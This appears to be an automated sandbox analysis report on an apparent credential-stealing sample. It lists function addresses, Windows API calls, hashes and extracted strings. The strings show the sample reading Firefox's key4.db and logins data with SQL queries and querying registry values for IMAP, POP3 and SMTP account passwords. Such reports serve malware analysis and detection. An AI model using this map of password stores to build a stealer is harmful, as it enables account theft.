                                                            • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                                            • memset.MSVCRT ref: 0040E6B5
                                                            • memset.MSVCRT ref: 0040E6CC
                                                              • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                              • Part of subcall function 004066A3: memcmp.MSVCRT(?,00456EA0,00000010,?,?,000000FF), ref: 004066EE
                                                            • memset.MSVCRT ref: 0040E736
                                                            • memset.MSVCRT ref: 0040E74F
                                                            • sprintf.MSVCRT ref: 0040E76D
                                                            • sprintf.MSVCRT ref: 0040E788
                                                            • _strcmpi.MSVCRT ref: 0040E79E
                                                            • _strcmpi.MSVCRT ref: 0040E7B7
                                                            • _strcmpi.MSVCRT ref: 0040E7D3
                                                            • memset.MSVCRT ref: 0040E858
                                                            • sprintf.MSVCRT ref: 0040E873
                                                            • _strcmpi.MSVCRT ref: 0040E889
                                                            • _strcmpi.MSVCRT ref: 0040E8A5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                            • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                            • API String ID: 4171719235-3943159138
                                                            • Opcode ID: d167a2cf797b5d1909f19c572c007443fa0765fe7e0db263b7bd4f21149122ce
                                                            • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                            • Opcode Fuzzy Hash: d167a2cf797b5d1909f19c572c007443fa0765fe7e0db263b7bd4f21149122ce
                                                            • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                            Function 00410401 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 264stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                            • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                            • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                            • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                            • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                            • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                            • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                            • GetWindowRect.USER32(?,?), ref: 00410487
                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                            • GetDC.USER32 ref: 004104E2
                                                            • strlen.MSVCRT ref: 00410522
                                                            • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                            • ReleaseDC.USER32(?,?), ref: 00410580
                                                            • sprintf.MSVCRT ref: 00410640
                                                            • SetWindowTextA.USER32(?,?), ref: 00410654
                                                            • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                            • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                            • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                            • GetClientRect.USER32(?,?), ref: 004106DD
                                                            • GetWindowRect.USER32(?,?), ref: 004106E7
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                            • GetClientRect.USER32(?,?), ref: 00410737
                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                            • String ID: %s:$EDIT$STATIC
                                                            • API String ID: 1703216249-3046471546
                                                            • Opcode ID: c45e47aa9121f830d125028a7f876627aec3aac4030610de851cfdb352c947b7
                                                            • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                                            • Opcode Fuzzy Hash: c45e47aa9121f830d125028a7f876627aec3aac4030610de851cfdb352c947b7
                                                            • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                                            Function 0040244A Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 132COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 004024F5
                                                              • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                            • _mbscpy.MSVCRT(?,00000000,?,?,?,76BAE430,?,00000000), ref: 00402533
                                                            • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _mbscpy$QueryValuememset
                                                            • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                            • API String ID: 168965057-606283353
                                                            • Opcode ID: 1065c6c96e973ba162a7e339d79e3b52940ae0a945bba20f0fb5bc86a04de48d
                                                            • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                            • Opcode Fuzzy Hash: 1065c6c96e973ba162a7e339d79e3b52940ae0a945bba20f0fb5bc86a04de48d
                                                            • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                            Function 004027BE Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 122COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 00402869
                                                              • Part of subcall function 004029A2: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029D3
                                                            • _mbscpy.MSVCRT(?,?,76BAE430,?,00000000), ref: 004028A3
                                                              • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,76BAE430,?,00000000), ref: 0040297B
                                                              • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                                            • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                            • API String ID: 1497257669-167382505
                                                            • Opcode ID: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                            • Instruction ID: 8a18399fb9ab4dbf3293ae90a7c33dbf32d2aa74b1f684e89f9c0cb2c5d46144
                                                            • Opcode Fuzzy Hash: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                            • Instruction Fuzzy Hash: F1514CB190124DAFEF60EF61CD85ACD7BB8FF04308F14812BF92466191D7B999488F98
                                                            Function 0040FC40 Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 220windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EndDialog.USER32(?,?), ref: 0040FC88
                                                            • GetDlgItem.USER32(?,000003EA), ref: 0040FCA0
                                                            • SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040FCBF
                                                            • SendMessageA.USER32(?,00000301,00000000,00000000), ref: 0040FCCC
                                                            • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040FCD5
                                                            • memset.MSVCRT ref: 0040FCFD
                                                            • memset.MSVCRT ref: 0040FD1D
                                                            • memset.MSVCRT ref: 0040FD3B
                                                            • memset.MSVCRT ref: 0040FD54
                                                            • memset.MSVCRT ref: 0040FD72
                                                            • memset.MSVCRT ref: 0040FD8B
                                                            • GetCurrentProcess.KERNEL32 ref: 0040FD93
                                                            • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040FDB8
                                                            • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040FDEE
                                                            • memset.MSVCRT ref: 0040FE45
                                                            • GetCurrentProcessId.KERNEL32 ref: 0040FE53
                                                            • memcpy.MSVCRT(?,00457E70,00000118), ref: 0040FE82
                                                            • _mbscpy.MSVCRT(?,00000000), ref: 0040FEA4
                                                            • sprintf.MSVCRT ref: 0040FF0F
                                                            • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040FF28
                                                            • GetDlgItem.USER32(?,000003EA), ref: 0040FF32
                                                            • SetFocus.USER32(00000000), ref: 0040FF39
                                                            Strings
                                                            • {Unknown}, xrefs: 0040FD02
                                                            • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040FF09
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_mbscpymemcpysprintf
                                                            • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                                            • API String ID: 1428123949-3474136107
                                                            • Opcode ID: de300881e20ea23b7bb50552807e946df4066f391255ce58fe159596e1188ae6
                                                            • Instruction ID: dbacf55a19a30e1480a431b78f30a2e126a23dc86512cc8492e46cc2065c5524
                                                            • Opcode Fuzzy Hash: de300881e20ea23b7bb50552807e946df4066f391255ce58fe159596e1188ae6
                                                            • Instruction Fuzzy Hash: 6371A972808345BFE7319B51EC41EDB7B9CFB84345F04043AF644921A2DA79DE49CB6A
                                                            Function 00401060 Relevance: 39.2, APIs: 26, Instructions: 186COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                            • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                            • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                            • LoadCursorA.USER32(00000067), ref: 0040115F
                                                            • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                            • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                            • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                            • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                            • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                            • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                            • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                            • EndDialog.USER32(?,00000001), ref: 0040121A
                                                            • DeleteObject.GDI32(?), ref: 00401226
                                                            • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                            • ShowWindow.USER32(00000000), ref: 00401253
                                                            • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                            • ShowWindow.USER32(00000000), ref: 00401262
                                                            • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                            • memset.MSVCRT ref: 0040128E
                                                            • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                            • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                            • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                            • String ID:
                                                            • API String ID: 2998058495-0
                                                            • Opcode ID: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                                            • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                            • Opcode Fuzzy Hash: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                                            • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                            Function 0040BBF0 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 300windowregistrystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00409070: LoadMenuA.USER32(00000000), ref: 00409078
                                                              • Part of subcall function 00409070: sprintf.MSVCRT ref: 0040909B
                                                            • SetMenu.USER32(?,00000000), ref: 0040BD23
                                                            • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040BD56
                                                            • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040BD6C
                                                            • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040BDCC
                                                            • LoadIconA.USER32(00000066,00000000), ref: 0040BE3B
                                                            • _strcmpi.MSVCRT ref: 0040BE93
                                                            • RegDeleteKeyA.ADVAPI32(80000001,0044C52F), ref: 0040BEA8
                                                            • SetFocus.USER32(?,00000000), ref: 0040BECE
                                                            • GetFileAttributesA.KERNEL32(0045AB10), ref: 0040BEE7
                                                            • GetTempPathA.KERNEL32(00000104,0045AB10), ref: 0040BEF7
                                                            • strlen.MSVCRT ref: 0040BEFE
                                                            • strlen.MSVCRT ref: 0040BF0C
                                                            • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040BF68
                                                              • Part of subcall function 00404B87: strlen.MSVCRT ref: 00404BA4
                                                              • Part of subcall function 00404B87: SendMessageA.USER32(?,0000101B,?,?), ref: 00404BC8
                                                            • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040BFB3
                                                            • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040BFC6
                                                            • memset.MSVCRT ref: 0040BFDB
                                                            • SetWindowTextA.USER32(?,?), ref: 0040BFFF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Loadstrlen$MenuWindow$AttributesClipboardCreateDeleteFileFocusFormatIconImagePathRegisterTempText_strcmpimemsetsprintf
                                                            • String ID: /noloadsettings$SysListView32$commdlg_FindReplace$report.html
                                                            • API String ID: 2303586283-933021314
                                                            • Opcode ID: ee83ce8392c91b6a1376ce061df6a688643c70b4fadf0565b78a002f471a3540
                                                            • Instruction ID: 018683a0c001df71ea8fb117e25ab04faf3265e4b472b332b07084323bdedb2f
                                                            • Opcode Fuzzy Hash: ee83ce8392c91b6a1376ce061df6a688643c70b4fadf0565b78a002f471a3540
                                                            • Instruction Fuzzy Hash: 5DC1C071644388FFEB15DF64CC45BDABBA5FF14304F04016AFA44A7292C7B5A904CBA9
                                                            Function 0044257F Relevance: 33.4, APIs: 7, Strings: 15, Instructions: 375COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                            • memcmp.MSVCRT(localhost,?,00000009,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442656
                                                            • memcmp.MSVCRT(vfs,00000001,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442800
                                                            • memcmp.MSVCRT(cache,00000001,00000005,00000000,00000000,BINARY), ref: 0044282C
                                                            • memcmp.MSVCRT(mode,00000001,00000004,00000000,00000000,BINARY), ref: 0044285E
                                                            • memcmp.MSVCRT(?,?,G+D,00000000,00000000,BINARY), ref: 004428A9
                                                            • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 0044293C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcmp$memcpy
                                                            • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                            • API String ID: 231171946-2189169393
                                                            • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                            • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                                            • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                            • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                                            Function 0041108D Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 101COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _mbscat$memsetsprintf$_mbscpy
                                                            • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                            • API String ID: 633282248-1996832678
                                                            • Opcode ID: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                                                            • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                            • Opcode Fuzzy Hash: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                                                            • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                            Function 00406746 Relevance: 30.3, APIs: 16, Strings: 4, Instructions: 287COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 00406782
                                                              • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                              • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                            • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040685E
                                                            • memcmp.MSVCRT(00000000,00457934,00000006,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040686E
                                                            • memcpy.MSVCRT(?,00000023,?,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068A1
                                                            • memcpy.MSVCRT(?,?,00000010), ref: 004068BA
                                                            • memcpy.MSVCRT(?,?,00000010), ref: 004068D3
                                                            • memcmp.MSVCRT(00000000,0045793C,00000006,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068EC
                                                            • memcpy.MSVCRT(?,00000015,?), ref: 00406908
                                                            • memcmp.MSVCRT(00000000,00456EA0,00000010,?,?,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 004069B2
                                                            • memcmp.MSVCRT(00000000,00457944,00000006), ref: 004069CA
                                                            • memcpy.MSVCRT(?,00000023,?), ref: 00406A03
                                                            • memcpy.MSVCRT(?,00000042,00000010), ref: 00406A1F
                                                            • memcpy.MSVCRT(?,00000054,00000020), ref: 00406A3B
                                                            • memcmp.MSVCRT(00000000,0045794C,00000006), ref: 00406A4A
                                                            • memcpy.MSVCRT(?,00000015,?), ref: 00406A6E
                                                            • memcpy.MSVCRT(?,0000001A,00000020), ref: 00406A86
                                                            Strings
                                                            • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                                            • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                                            • key4.db, xrefs: 00406756
                                                            • , xrefs: 00406834
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy$memcmp$memsetstrlen
                                                            • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                            • API String ID: 3614188050-3983245814
                                                            • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                            • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                                                            • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                            • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                                                            Function 0040A953 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 182COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 0040A973
                                                            • memset.MSVCRT ref: 0040A996
                                                            • memset.MSVCRT ref: 0040A9AC
                                                            • memset.MSVCRT ref: 0040A9BC
                                                            • sprintf.MSVCRT ref: 0040A9F0
                                                            • _mbscpy.MSVCRT(00000000, nowrap), ref: 0040AA37
                                                            • sprintf.MSVCRT ref: 0040AABE
                                                            • _mbscat.MSVCRT ref: 0040AAED
                                                              • Part of subcall function 00410FD3: sprintf.MSVCRT ref: 00410FF7
                                                            • _mbscpy.MSVCRT(?,?), ref: 0040AAD2
                                                            • sprintf.MSVCRT ref: 0040AB21
                                                              • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                              • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,75D50A60,00000000,?,?,0040A7BE,00000001,0044CBC0,75D50A60), ref: 00406D4D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                                            • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                            • API String ID: 710961058-601624466
                                                            • Opcode ID: c33c3296b7e77e76534675bd69894b8e30877f2258b439036e8e249278821d93
                                                            • Instruction ID: c58e6c37e7046e1a5f8c637d7d1376bb8f99d5739874c3f6ad91cefff1898c28
                                                            • Opcode Fuzzy Hash: c33c3296b7e77e76534675bd69894b8e30877f2258b439036e8e249278821d93
                                                            • Instruction Fuzzy Hash: 5F61BC31900258AFEF14DF58CC86E9E7B79EF08314F10019AF909AB1D2DB78AA51CB55
                                                            Function 004111AA Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 114COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: sprintf$memset$_mbscpy
                                                            • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                            • API String ID: 3402215030-3842416460
                                                            • Opcode ID: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
                                                            • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                            • Opcode Fuzzy Hash: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
                                                            • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                            Function 0040F0CE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 192stringCOMMON
                                                            Download Yara Rule
